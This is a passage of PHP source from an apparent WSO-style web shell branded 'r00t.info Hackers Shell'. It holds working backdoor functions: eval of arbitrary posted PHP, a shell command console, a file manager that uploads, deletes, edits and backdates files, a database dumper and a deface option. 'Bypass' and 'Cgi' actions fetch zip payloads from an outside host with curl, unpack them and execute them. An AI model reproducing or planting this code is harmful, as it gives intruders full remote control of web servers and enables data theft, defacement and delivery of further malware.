{.*}!msiU','',\$tmp);\r\n echo \$tmp;\r\n echo '</div><br>';\r\n } if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit=\"if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\'\\');\r\n}return false;\r\n\"><textarea name=code class=bigarea id=PhpCode>'.(!empty(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'</textarea><input type=submit value=Eval style=\"margin-top:5px\">';\r\n echo ' <input type=checkbox name=ajax value=1 '.(@\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style=\"'.(empty(\$_POST['p1'])?'display:none;\r\n':'').'margin-top:5px;\r\n\" class=ml1>';\r\n if(!empty(\$_POST['p1'])) { ob_start();\r\n eval(\$_POST['p1']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo '</pre></div>';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo '<h1>File manager</h1><div class=content>';\r\n if(isset(\$_POST['p1'])) { switch(\$_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file(\$_FILES['f']['tmp_name'], \$_FILES['f']['name'])) echo \"Can't upload file!\";\r\n break;\r\n break;\r\n case 'mkdir': if(!@mkdir(\$_POST['p2'])) echo \"Can't create new dir\";\r\n break;\r\n case 'delete': function deleteDir(\$path) { \$path = (substr(\$path,-1)=='/') ? \$path:\$path.'/';\r\n \$dh = opendir(\$path);\r\n while ( (\$item = readdir(\$dh) ) !== false) { \$item = \$path.\$item;\r\n if ( (basename(\$item) == \"..\") || (basename(\$item) == \".\") ) continue;\r\n \$type = filetype(\$item);\r\n if (\$type == \"dir\") deleteDir(\$item);\r\n else @unlink(\$item);\r\n } closedir(\$dh);\r\n rmdir(\$path);\r\n } if(is_array(@\$_POST['f'])) foreach(\$_POST['f'] as \$f) { \$f = urldecode(\$f);\r\n if(is_dir(\$f)) deleteDir(\$f);\r\n else @unlink(\$f);\r\n } break;\r\n case 'paste': if(\$_SESSION['act'] == 'copy') { function copy_paste(\$c,\$s,\$d){ if(is_dir(\$c.\$s)){ mkdir(\$d.\$s);\r\n \$h = opendir(\$c.\$s);\r\n while ((\$f = readdir(\$h)) !== false) if ((\$f != \".\") and (\$f != \"..\")) { copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n } } elseif(is_file(\$c.\$s)) { @copy(\$c.\$s, \$d.\$s);\r\n } } foreach(\$_SESSION['f'] as \$f) copy_paste(\$_SESSION['cwd'],\$f, \$GLOBALS['cwd']);\r\n } elseif(\$_SESSION['act'] == 'move') { function move_paste(\$c,\$s,\$d){ if(is_dir(\$c.\$s)){ mkdir(\$d.\$s);\r\n \$h = opendir(\$c.\$s);\r\n while ((\$f = readdir(\$h)) !== false) if ((\$f != \".\") and (\$f != \"..\")) { copy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n } } elseif(is_file(\$c.\$s)) { @copy(\$c.\$s, \$d.\$s);\r\n } } foreach(\$_SESSION['f'] as \$f) @rename(\$_SESSION['cwd'].\$f, \$GLOBALS['cwd'].\$f);\r\n } unset(\$_SESSION['f']);\r\n break;\r\n default: if(!empty(\$_POST['p1']) && ((\$_POST['p1'] == 'copy')||(\$_POST['p1'] == 'move')) ) { \$_SESSION['act'] = @\$_POST['p1'];\r\n \$_SESSION['f'] = @\$_POST['f'];\r\n foreach(\$_SESSION['f'] as \$k => \$f) \$_SESSION['f'][\$k] = urldecode(\$f);\r\n \$_SESSION['cwd'] = @\$_POST['c'];\r\n } break;\r\n } echo '<script>document.mf.p1.value=\"\";\r\ndocument.mf.p2.value=\"\";\r\n</script>';\r\n } \$dirContent = @scandir(isset(\$_POST['c'])?\$_POST['c']:\$GLOBALS['cwd']);\r\n if(\$dirContent === false) { echo 'Can\\'t open this folder!';\r\n return;\r\n } global \$sort;\r\n \$sort = array('name', 1);\r\n if(!empty(\$_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\\d{1})!', \$_POST['p1'], \$match)) \$sort = array(\$match[1], (int)\$match[2]);\r\n } echo '<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\'checkbox\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\'100%\\' class=\\'main\\' cellspacing=\\'0\\' cellpadding=\\'2\\'>\r\n <form name=files method=post>';\r\n echo \"<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'>Name</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_size_\".(\$sort[1]?0:1).\"\\\")'>Size</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_modify_\".(\$sort[1]?0:1).\"\\\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_perms_\".(\$sort[1]?0:1).\"\\\")'>Permissions</a></th><th>Actions</th></tr>\";\r\n \$dirs = \$files = \$links = array();\r\n \$n = count(\$dirContent);\r\n for(\$i=0;\r\n\$i<\$n;\r\n\$i++) { \$ow = @posix_getpwuid(@fileowner(\$dirContent[\$i]));\r\n \$gr = @posix_getgrgid(@filegroup(\$dirContent[\$i]));\r\n \$tmp = array('name' => \$dirContent[\$i], 'path' => \$GLOBALS['cwd'].\$dirContent[\$i], 'modify' => @date('Y-m-d H:i:s',@filemtime(\$GLOBALS['cwd'].\$dirContent[\$i])), 'perms' => viewPermsColor(\$GLOBALS['cwd'].\$dirContent[\$i]), 'size' => @filesize(\$GLOBALS['cwd'].\$dirContent[\$i]), 'owner' => \$ow['name']?\$ow['name']:@fileowner(\$dirContent[\$i]), 'group' => \$gr['name']?\$gr['name']:@filegroup(\$dirContent[\$i]) );\r\n if(@is_file(\$GLOBALS['cwd'].\$dirContent[\$i])) \$files[] = array_merge(\$tmp, array('type' => 'file'));\r\n elseif(@is_link(\$GLOBALS['cwd'].\$dirContent[\$i])) \$links[] = array_merge(\$tmp, array('type' => 'link'));\r\n elseif(@is_dir(\$GLOBALS['cwd'].\$dirContent[\$i])&& (\$dirContent[\$i] != \".\")) \$dirs[] = array_merge(\$tmp, array('type' => 'dir'));\r\n } \$GLOBALS['sort'] = \$sort;\r\n function cmp(\$a, \$b) { if(\$GLOBALS['sort'][0] != 'size') return strcmp(\$a[\$GLOBALS['sort'][0]], \$b[\$GLOBALS['sort'][0]])*(\$GLOBALS['sort'][1]?1:-1);\r\n else return ((\$a['size'] < \$b['size']) ? -1 : 1)*(\$GLOBALS['sort'][1]?1:-1);\r\n } usort(\$files, \"cmp\");\r\n usort(\$dirs, \"cmp\");\r\n usort(\$links, \"cmp\");\r\n \$files = array_merge(\$dirs, \$links, \$files);\r\n \$l = 0;\r\n foreach(\$files as \$f) { echo '<tr'.(\$l?' class=l1':'').'><td><input type=checkbox name=\"f[]\" value=\"'.urlencode(\$f['name']).'\" class=chkbx></td><td><a href=# onclick=\"'.((\$f['type']=='file')?'g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'view\\')\">'.htmlspecialchars(\$f['name']):'g(\\'FilesMan\\',\\''.\$f['path'].'\\');\r\n\"><b>[ '.htmlspecialchars(\$f['name']).' ]</b>').'</a></td><td>'.((\$f['type']=='file')?viewSize(\$f['size']):\$f['type']).'</td><td>'.\$f['modify'].'</td><td>'.\$f['owner'].'/'.\$f['group'].'</td><td><a href=# onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\',\\'chmod\\')\">'.\$f['perms'] .'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'rename\\')\">R</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'touch\\')\">T</a>'.((\$f['type']=='file')?' <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'edit\\')\">E</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'download\\')\">D</a>':'').'</td></tr>';\r\n \$l = \$l?0:1;\r\n } echo '<tr><td colspan=5>\r\n <input type=hidden name=a value=\\'FilesMan\\'>\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <select name=\\'p1\\'><option value=\\'copy\\'>Copy</option><option value=\\'move\\'>Move</option><option value=\\'delete\\'>Delete</option>';\r\n if(!empty(\$_SESSION['act'])&&@count(\$_SESSION['f'])){echo '<option value=\\'paste\\'>Paste</option>';\r\n } echo '</select>&nbsp;\r\n<input type=\"submit\" value=\">>\"></td><td colspan=\"2\" align=\"right\" width=\"1\"><input name=\"def\" value=\"r00t.info shell\" disabled=\"disabled\"/>&nbsp;\r\n<input type=\"submit\" value=\"Add Deface Here\" disabled=\"disabled\"></td></tr>\r\n </form></table></div>';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin(\$p) {return decbin(hexdec(\$p));\r\n}} if(!function_exists('hex2ascii')) {function hex2ascii(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strLen(\$p);\r\n\$i+=2){\$r.=chr(hexdec(\$p[\$i].\$p[\$i+1]));\r\n}return \$r;\r\n}} if(!function_exists('ascii2hex')) {function ascii2hex(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strlen(\$p);\r\n++\$i)\$r.= dechex(ord(\$p[\$i]));\r\nreturn strtoupper(\$r);\r\n}} if(!function_exists('full_urlencode')) {function full_urlencode(\$p){\$r='';\r\nfor(\$i=0;\r\n\$i<strlen(\$p);\r\n++\$i)\$r.= '%'.dechex(ord(\$p[\$i]));\r\nreturn strtoupper(\$r);\r\n}} if(isset(\$_POST['ajax'])) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n if(function_exists(\$_POST['p1'])) echo \$_POST['p1'](\$_POST['p2']);\r\n \$temp = \"document.getElementById('strOutput').style.display='';\r\ndocument.getElementById('strOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\r\n\\n\";\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n echo '<h1>String conversions</h1><div class=content>';\r\n \$stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', );\r\n if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo \"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n'><select name='selectTool'>\";\r\n foreach(\$stringTools as \$k => \$v) echo \"<option value='\".htmlspecialchars(\$v).\"'>\".\$k.\"</option>\";\r\n echo \"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 \".(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').\"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>\".htmlspecialchars(@\$_POST['p2']).\"</textarea></form><pre class='ml1' style='\".(empty(\$_POST['p1'])?'display:none;\r\n':'').\"margin-top:5px' id='strOutput'>\";\r\n if(!empty(\$_POST['p1'])) { if(function_exists(\$_POST['p1'])) echo htmlspecialchars(\$_POST['p1'](\$_POST['p2']));\r\n } echo\"</pre></div>\";\r\n printFooter();\r\n } function actionFilesTools() { if( isset(\$_POST['p1']) ) \$_POST['p1'] = urldecode(\$_POST['p1']);\r\n if(@\$_POST['p2']=='download') { if(is_file(\$_POST['p1']) && is_readable(\$_POST['p1'])) { ob_start(\"ob_gzhandler\", 4096);\r\n header(\"Content-Disposition: attachment;\r\n filename=\".basename(\$_POST['p1']));\r\n if (function_exists(\"mime_content_type\")) { \$type = @mime_content_type(\$_POST['p1']);\r\n header(\"Content-Type: \".\$type);\r\n } \$fp = @fopen(\$_POST['p1'], \"r\");\r\n if(\$fp) { while(!@feof(\$fp)) echo @fread(\$fp, 1024);\r\n fclose(\$fp);\r\n } } elseif(is_dir(\$_POST['p1']) && is_readable(\$_POST['p1'])) { } exit;\r\n } if( @\$_POST['p2'] == 'mkfile' ) { if(!file_exists(\$_POST['p1'])) { \$fp = @fopen(\$_POST['p1'], 'w');\r\n if(\$fp) { \$_POST['p2'] = \"edit\";\r\n fclose(\$fp);\r\n } } } printHeader();\r\n echo '<h1>File tools</h1><div class=content>';\r\n if( !file_exists(@\$_POST['p1']) ) { echo 'File not exists';\r\n printFooter();\r\n return;\r\n } \$uid = @posix_getpwuid(@fileowner(\$_POST['p1']));\r\n \$gid = @posix_getgrgid(@fileowner(\$_POST['p1']));\r\n echo '<span>Name:</span> '.htmlspecialchars(\$_POST['p1']).' <span>Size:</span> '.(is_file(\$_POST['p1'])?viewSize(filesize(\$_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor(\$_POST['p1']).' <span>Owner/Group:</span> '.\$uid['name'].'/'.\$gid['name'].'<br>';\r\n echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime(\$_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime(\$_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime(\$_POST['p1'])).'<br><br>';\r\n if( empty(\$_POST['p2']) ) \$_POST['p2'] = 'view';\r\n if( is_file(\$_POST['p1']) ) \$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');\r\n else \$m = array('Chmod', 'Rename', 'Touch');\r\n foreach(\$m as \$v) echo '<a href=# onclick=\"g(null,null,null,\\''.strtolower(\$v).'\\')\">'.((strtolower(\$v)==@\$_POST['p2'])?'<b>[ '.\$v.' ]</b>':\$v).'</a> ';\r\n echo '<br><br>';\r\n switch(\$_POST['p2']) { case 'view': echo '<pre class=ml1>';\r\n \$fp = @fopen(\$_POST['p1'], 'r');\r\n if(\$fp) { while( !@feof(\$fp) ) echo htmlspecialchars(@fread(\$fp, 1024));\r\n @fclose(\$fp);\r\n } echo '</pre>';\r\n break;\r\n case 'highlight': if( is_readable(\$_POST['p1']) ) { echo '<div class=ml1 style=\"background-color: #e1e1e1;\r\ncolor:black;\r\n\">';\r\n \$code = highlight_file(\$_POST['p1'],true);\r\n echo str_replace(array('<span ','</span>'), array('<font ','</font>'),\$code).'</div>';\r\n } break;\r\n case 'chmod': if( !empty(\$_POST['p3']) ) { \$perms = 0;\r\n for(\$i=strlen(\$_POST['p3'])-1;\r\n\$i>=0;\r\n--\$i) \$perms += (int)\$_POST['p3'][\$i]*pow(8, (strlen(\$_POST['p3'])-\$i-1));\r\n if(!@chmod(\$_POST['p1'], \$perms)) echo 'Can\\'t set permissions!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n else die('<script>g(null,null,null,null,\"\")</script>');\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n\"><input type=text name=chmod value=\"'.substr(sprintf('%o', fileperms(\$_POST['p1'])),-4).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'edit': if( !is_writable(\$_POST['p1'])) { echo 'File isn\\'t writeable';\r\n break;\r\n } if( !empty(\$_POST['p3']) ) { @file_put_contents(\$_POST['p1'],\$_POST['p3']);\r\n echo 'Saved!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.text.value);\r\nreturn false;\r\n\"><textarea name=text class=bigarea>';\r\n \$fp = @fopen(\$_POST['p1'], 'r');\r\n if(\$fp) { while( !@feof(\$fp) ) echo htmlspecialchars(@fread(\$fp, 1024));\r\n @fclose(\$fp);\r\n } echo '</textarea><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'hexdump': \$c = @file_get_contents(\$_POST['p1']);\r\n \$n = 0;\r\n \$h = array('00000000<br>','','');\r\n \$len = strlen(\$c);\r\n for (\$i=0;\r\n \$i<\$len;\r\n ++\$i) { \$h[1] .= sprintf('%02X',ord(\$c[\$i])).' ';\r\n switch ( ord(\$c[\$i]) ) { case 0: \$h[2] .= ' ';\r\n break;\r\n case 9: \$h[2] .= ' ';\r\n break;\r\n case 10: \$h[2] .= ' ';\r\n break;\r\n case 13: \$h[2] .= ' ';\r\n break;\r\n default: \$h[2] .= \$c[\$i];\r\n break;\r\n } \$n++;\r\n if (\$n == 32) { \$n = 0;\r\n if (\$i+1 < \$len) {\$h[0] .= sprintf('%08X',\$i+1).'<br>';\r\n} \$h[1] .= '<br>';\r\n \$h[2] .= \"\\n\";\r\n } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\r\n\"><pre>'.\$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.\$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars(\$h[2]).'</pre></td></tr></table>';\r\n break;\r\n case 'rename': if( !empty(\$_POST['p3']) ) { if(!@rename(\$_POST['p1'], \$_POST['p3'])) echo 'Can\\'t rename!<br><script>document.mf.p3.value=\"\";\r\n</script>';\r\n else die('<script>g(null,null,\"'.urlencode(\$_POST['p3']).'\",null,\"\")</script>');\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.name.value);\r\nreturn false;\r\n\"><input type=text name=name value=\"'.htmlspecialchars(\$_POST['p1']).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'touch': if( !empty(\$_POST['p3']) ) { \$time = strtotime(\$_POST['p3']);\r\n if(\$time) { if(@touch(\$_POST['p1'],\$time,\$time)) die('<script>g(null,null,null,null,\"\")</script>');\r\n else { echo 'Fail!<script>document.mf.p3.value=\"\";\r\n</script>';\r\n } } else echo 'Bad time format!<script>document.mf.p3.value=\"\";\r\n</script>';\r\n } echo '<form onsubmit=\"g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n\"><input type=text name=touch value=\"'.date(\"Y-m-d H:i:s\", @filemtime(\$_POST['p1'])).'\"><input type=submit value=\">>\"></form>';\r\n break;\r\n case 'mkfile': break;\r\n } echo '</div>';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists('cpanel/cpanel.php')){ \$dizin = 'https://byr00t.co/vb/cpanel.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"cpanel\");\r\n \$zip = new ZipArchive();\r\n \$file = 'cpanel.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('cpanel/');\r\n if(file_exists('cpanel.zip')){ @unlink('cpanel.zip');\r\n } if(\$cikar){ echo \"<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('cpanel/cpanel.php')){ echo \"<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionConsole() { if(isset(\$_POST['ajax'])) { \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n ob_start();\r\n echo \"document.cf.cmd.value='';\r\n\\n\";\r\n \$temp = @iconv(\$_POST['charset'], 'UTF-8', addcslashes(\"\\n\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']),\"\\n\\r\\t\\\\'\\0\"));\r\n if(preg_match(\"!.*cd\\s+([^;\r\n]+)\$!\",\$_POST['p1'],\$match)) { if(@chdir(\$match[1])) { \$GLOBALS['cwd'] = @getcwd();\r\n echo \"document.mf.c.value='\".\$GLOBALS['cwd'].\"';\r\n\";\r\n } } echo \"document.cf.output.value+='\".\$temp.\"';\r\n\";\r\n echo \"document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n\";\r\n \$temp = ob_get_clean();\r\n echo strlen(\$temp), \"\\n\", \$temp;\r\n exit;\r\n } printHeader();\r\n echo '<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array(\"\");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push(\"\");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>';\r\n echo '<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(document.cf.cmd.value==\\'clear\\'){document.cf.output.value=\\'\\';\r\ndocument.cf.cmd.value=\\'\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n\"><select name=alias>';\r\n foreach(\$GLOBALS['aliases'] as \$n => \$v) { if(\$v == '') { echo '<optgroup label=\"-'.htmlspecialchars(\$n).'-\"></optgroup>';\r\n continue;\r\n } echo '<option value=\"'.htmlspecialchars(\$v).'\">'.\$n.'</option>';\r\n } if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1'])) \$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n echo '</select><input type=button onclick=\"add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}\" value=\">>\"> <input type=checkbox name=ajax value=1 '.(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style=\"border-bottom:0;\r\n\" readonly>';\r\n if(!empty(\$_POST['p1'])) { echo htmlspecialchars(\"\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']));\r\n } echo '</textarea><input type=text name=cmd style=\"border-top:0;\r\nwidth:100%;\r\n\" onkeydown=\"kp(event);\r\n\">';\r\n echo '</form></div><script>document.cf.cmd.focus();\r\n</script>';\r\n printFooter();\r\n } function actionLogout() { unset(\$_SESSION[md5(\$_SERVER['HTTP_HOST'])]);\r\n echo '\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert(\"Logout Successful\")</script>\r\n <body bgcolor=#ffffff><center><img src=\"http://r00t.info/shell-dosyalar/logo.png\"></center>\r\n <H1><center><p style=\"color: #DF0101\" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src=\"http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100\" scrolling=\"no\" \r\nframeborder=\"0\" style=\"background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n\" allowtransparency=\"true\"></iframe></center>\r\n <H3><marquee scrollamount=\"5\" scrolldelay=\"50\" width=\"100%\"><p style=\"color: #DF0101\" >Wso shell</p></marquee></H3></body>';\r\n } function actionSelfRemove() { printHeader();\r\n if(\$_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed');\r\n else echo 'unlink error!';\r\n } echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,\\'yes\\')\">Yes</a></div>';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists('cgi/rot.cin')){ \$dizin = 'https://byr00t.co/vb/cgi.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"cgi\");\r\n \$zip = new ZipArchive();\r\n \$file = 'cgi.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('cgi/');\r\n if(file_exists('cgi.zip')){ @unlink('cgi.zip');\r\n } if(\$cikar){ chmod('cgi/rot.cin', 0755);\r\n echo \"<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('cgi/rot.cin')){ echo \"<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var \$type;\r\n var \$link;\r\n var \$res;\r\n function DbClass(\$type) { \$this->type = \$type;\r\n } function connect(\$host, \$user, \$pass, \$dbname){ switch(\$this->type) { case 'mysql': if( \$this->link = @mysql_connect(\$host,\$user,\$pass,true) ) return true;\r\n break;\r\n case 'pgsql': \$host = explode(':', \$host);\r\n if(!\$host[1]) \$host[1]=5432;\r\n if( \$this->link = @pg_connect(\"host={\$host[0]} port={\$host[1]} user=\$user password=\$pass dbname=\$dbname\") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb(\$db) { switch(\$this->type) { case 'mysql': if (@mysql_select_db(\$db))return true;\r\n break;\r\n } return false;\r\n } function query(\$str) { switch(\$this->type) { case 'mysql': return \$this->res = @mysql_query(\$str);\r\n break;\r\n case 'pgsql': return \$this->res = @pg_query(\$this->link,\$str);\r\n break;\r\n } return false;\r\n } function fetch() { \$res = func_num_args()?func_get_arg(0):\$this->res;\r\n switch(\$this->type) { case 'mysql': return @mysql_fetch_assoc(\$res);\r\n break;\r\n case 'pgsql': return @pg_fetch_assoc(\$res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch(\$this->type) { case 'mysql': return \$this->res = @mysql_list_dbs(\$this->link);\r\n break;\r\n case 'pgsql': return \$this->res = \$this->query(\"SELECT datname FROM pg_database\");\r\n break;\r\n } return false;\r\n } function listTables() { switch(\$this->type) { case 'mysql': return \$this->res = \$this->query('SHOW TABLES');\r\n break;\r\n case 'pgsql': return \$this->res = \$this->query(\"select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'\");\r\n break;\r\n } return false;\r\n } function error() { switch(\$this->type) { case 'mysql': return @mysql_error(\$this->link);\r\n break;\r\n case 'pgsql': return @pg_last_error(\$this->link);\r\n break;\r\n } return false;\r\n } function setCharset(\$str) { switch(\$this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset(\$str, \$this->link);\r\n else \$this->query('SET CHARSET '.\$str);\r\n break;\r\n case 'mysql': return @pg_set_client_encoding(\$this->link, \$str);\r\n break;\r\n } return false;\r\n } function dump(\$table) { switch(\$this->type) { case 'mysql': \$res = \$this->query('SHOW CREATE TABLE `'.\$table.'`');\r\n \$create = mysql_fetch_array(\$res);\r\n echo \$create[1].\";\r\n\\n\\n\";\r\n \$this->query('SELECT * FROM `'.\$table.'`');\r\n while(\$item = \$this->fetch()) { \$columns = array();\r\n foreach(\$item as \$k=>\$v) { \$item[\$k] = \"'\".@mysql_real_escape_string(\$v).\"'\";\r\n \$columns[] = \"`\".\$k.\"`\";\r\n } 